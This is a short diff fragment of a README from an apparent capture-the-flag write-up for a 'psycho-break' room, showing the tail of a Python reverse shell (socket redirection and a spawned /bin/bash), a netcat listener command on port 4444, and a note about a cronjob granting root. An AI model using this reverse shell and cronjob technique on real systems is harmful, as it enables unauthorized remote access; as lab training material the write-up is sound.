k21009051/Mustacchio-V2-Write-up/psycho-break/README.md

 os.dup2(s.fileno(),2)
 import pty
 pty.spawn("/bin/bash")
 ```

 Then, setup the listener with **nc -lvnp 4444** and wait for the cronjob to run!
 The root flag was found in the /root directory as usual :)

 This challenge was so fun!
-Not particularly difficult, but had a lot of enjoyable elements like the morse code in the .wav file.
+Not particularly difficult, but had a lot of enjoyable elements like the morse code in the .wav file and the custom brute force script.